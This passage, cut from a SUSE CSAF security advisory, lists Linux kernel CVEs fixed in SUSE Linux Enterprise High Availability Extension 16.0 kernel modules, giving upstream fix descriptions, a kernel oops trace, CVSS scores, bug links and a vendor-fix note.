"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2026-22996"
},
{
"cve": "CVE-2026-22997",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22997"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: can: j1939: j1939_xtp_rx_rts_session_active(): deactivate session upon receiving the second rts\n\nSince j1939_session_deactivate_activate_next() in j1939_tp_rxtimer() is\ncalled only when the timer is enabled, we need to call\nj1939_session_deactivate_activate_next() if we cancelled the timer.\nOtherwise, refcount for j1939_session leaks, which will later appear as\n\n| unregister_netdevice: waiting for vcan0 to become free. Usage count = 2.\n\nproblem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22997",
"url": "https://www.suse.com/security/cve/CVE-2026-22997"
},
{
"category": "external",
"summary": "SUSE Bug 1257202 for CVE-2026-22997",
"url": "https://bugzilla.suse.com/1257202"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2026-22997"
},
{
"cve": "CVE-2026-22999",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22999"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_qfq: do not free existing class in qfq_change_class()\n\nFixes qfq_change_class() error case.\n\ncl-\u003eqdisc and cl should only be freed if a new class and qdisc\nwere allocated, or we risk various UAF.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22999",
"url": "https://www.suse.com/security/cve/CVE-2026-22999"
},
{
"category": "external",
"summary": "SUSE Bug 1257236 for CVE-2026-22999",
"url": "https://bugzilla.suse.com/1257236"
},
{
"category": "external",
"summary": "SUSE Bug 1257238 for CVE-2026-22999",
"url": "https://bugzilla.suse.com/1257238"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "important"
}
],
"title": "CVE-2026-22999"
},
{
"cve": "CVE-2026-23000",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23000"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Fix crash on profile change rollback failure\n\nmlx5e_netdev_change_profile can fail to attach a new profile and can\nfail to rollback to old profile, in such case, we could end up with a\ndangling netdev with a fully reset netdev_priv. A retry to change\nprofile, e.g. another attempt to call mlx5e_netdev_change_profile via\nswitchdev mode change, will crash trying to access the now NULL\npriv-\u003emdev.\n\nThis fix allows mlx5e_netdev_change_profile() to handle previous\nfailures and an empty priv, by not assuming priv is valid.\n\nPass netdev and mdev to all flows requiring\nmlx5e_netdev_change_profile() and avoid passing priv.\nIn mlx5e_netdev_change_profile() check if current priv is valid, and if\nnot, just attach the new profile without trying to access the old one.\n\nThis fixes the following oops, when enabling switchdev mode for the 2nd\ntime after first time failure:\n\n ## Enabling switchdev mode first time:\n\nmlx5_core 0012:03:00.1: E-Switch: Supported tc chains and prios offload\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: new profile init failed, -12\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: failed to rollback to orig profile, -12\n ^^^^^^^^\nmlx5_core 0000:00:03.0: E-Switch: Disable: mode(LEGACY), nvfs(0), necvfs(0), active vports(0)\n\n ## retry: Enabling switchdev mode 2nd time:\n\nmlx5_core 0000:00:03.0: E-Switch: Supported tc chains and prios offload\nBUG: kernel NULL pointer dereference, address: 0000000000000038\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\nPGD 0 P4D 0\nOops: Oops: 0000 [#1] SMP NOPTI\nCPU: 13 UID: 0 PID: 520 Comm: devlink Not tainted 6.18.0-rc4+ #91 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014\nRIP: 0010:mlx5e_detach_netdev+0x3c/0x90\nCode: 50 00 00 f0 80 4f 78 02 48 8b bf e8 07 00 00 48 85 ff 74 16 48 8b 73 78 48 d1 ee 83 e6 01 83 f6 01 40 0f b6 f6 e8 c4 42 00 00 \u003c48\u003e 8b 45 38 48 85 c0 74 08 48 89 df e8 cc 47 40 1e 48 8b bb f0 07\nRSP: 0018:ffffc90000673890 EFLAGS: 00010246\nRAX: 0000000000000000 RBX: ffff8881036a89c0 RCX: 0000000000000000\nRDX: ffff888113f63800 RSI: ffffffff822fe720 RDI: 0000000000000000\nRBP: 0000000000000000 R08: 0000000000002dcd R09: 0000000000000000\nR10: ffffc900006738e8 R11: 00000000ffffffff R12: 0000000000000000\nR13: 0000000000000000 R14: ffff8881036a89c0 R15: 0000000000000000\nFS: 00007fdfb8384740(0000) GS:ffff88856a9d6000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000038 CR3: 0000000112ae0005 CR4: 0000000000370ef0\nCall Trace:\n \u003cTASK\u003e\n mlx5e_netdev_change_profile+0x45/0xb0\n mlx5e_vport_rep_load+0x27b/0x2d0\n mlx5_esw_offloads_rep_load+0x72/0xf0\n esw_offloads_enable+0x5d0/0x970\n mlx5_eswitch_enable_locked+0x349/0x430\n ? is_mp_supported+0x57/0xb0\n mlx5_devlink_eswitch_mode_set+0x26b/0x430\n devlink_nl_eswitch_set_doit+0x6f/0xf0\n genl_family_rcv_msg_doit+0xe8/0x140\n genl_rcv_msg+0x18b/0x290\n ? __pfx_devlink_nl_pre_doit+0x10/0x10\n ? __pfx_devlink_nl_eswitch_set_doit+0x10/0x10\n ? __pfx_devlink_nl_post_doit+0x10/0x10\n ? __pfx_genl_rcv_msg+0x10/0x10\n netlink_rcv_skb+0x52/0x100\n genl_rcv+0x28/0x40\n netlink_unicast+0x282/0x3e0\n ? __alloc_skb+0xd6/0x190\n netlink_sendmsg+0x1f7/0x430\n __sys_sendto+0x213/0x220\n ? __sys_recvmsg+0x6a/0xd0\n __x64_sys_sendto+0x24/0x30\n do_syscall_64+0x50/0x1f0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\nRIP: 0033:0x7fdfb8495047",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23000",
"url": "https://www.suse.com/security/cve/CVE-2026-23000"
},
{
"category": "external",
"summary": "SUSE Bug 1257234 for CVE-2026-23000",
"url": "https://bugzilla.suse.com/1257234"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2026-23000"
},
{
"cve": "CVE-2026-23001",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23001"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacvlan: fix possible UAF in macvlan_forward_source()\n\nAdd RCU protection on (struct macvlan_source_entry)-\u003evlan.\n\nWhenever macvlan_hash_del_source() is called, we must clear\nentry-\u003evlan pointer before RCU grace period starts.\n\nThis allows macvlan_forward_source() to skip over\nentries queued for freeing.\n\nNote that macvlan_dev are already RCU protected, as they\nare embedded in a standard netdev (netdev_priv(ndev)).\n\nhttps: //lore.kernel.org/netdev/695fb1e8.050a0220.1c677c.039f.GAE@google.com/T/#u",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23001",
"url": "https://www.suse.com/security/cve/CVE-2026-23001"
},
{
"category": "external",
"summary": "SUSE Bug 1257232 for CVE-2026-23001",
"url": "https://bugzilla.suse.com/1257232"
},
{
"category": "external",
"summary": "SUSE Bug 1257233 for CVE-2026-23001",
"url": "https://bugzilla.suse.com/1257233"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "important"
}
],
"title": "CVE-2026-23001"
},
{
"cve": "CVE-2026-23002",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23002"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlib/buildid: use __kernel_read() for sleepable context\n\nPrevent a \"BUG: unable to handle kernel NULL pointer dereference in\nfilemap_read_folio\".\n\nFor the sleepable context, convert freader to use __kernel_read() instead\nof direct page cache access via read_cache_folio(). This simplifies the\nfaultable code path by using the standard kernel file reading interface\nwhich handles all the complexity of reading file data.\n\nAt the moment we are not changing the code for non-sleepable context which\nuses filemap_get_folio() and only succeeds if the target folios are\nalready in memory and up-to-date. The reason is to keep the patch simple\nand easier to backport to stable kernels.\n\nSyzbot repro does not crash the kernel anymore and the selftests run\nsuccessfully.\n\nIn the follow up we will make __kernel_read() with IOCB_NOWAIT work for\nnon-sleepable contexts. In addition, I would like to replace the\nsecretmem check with a more generic approach and will add fstest for the\nbuildid code.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23002",
"url": "https://www.suse.com/security/cve/CVE-2026-23002"
},
{
"category": "external",
"summary": "SUSE Bug 1257243 for CVE-2026-23002",
"url": "https://bugzilla.suse.com/1257243"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2026-23002"
},
{
"cve": "CVE-2026-23005",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23005"
}
],
"notes": [
{
"category": "general",
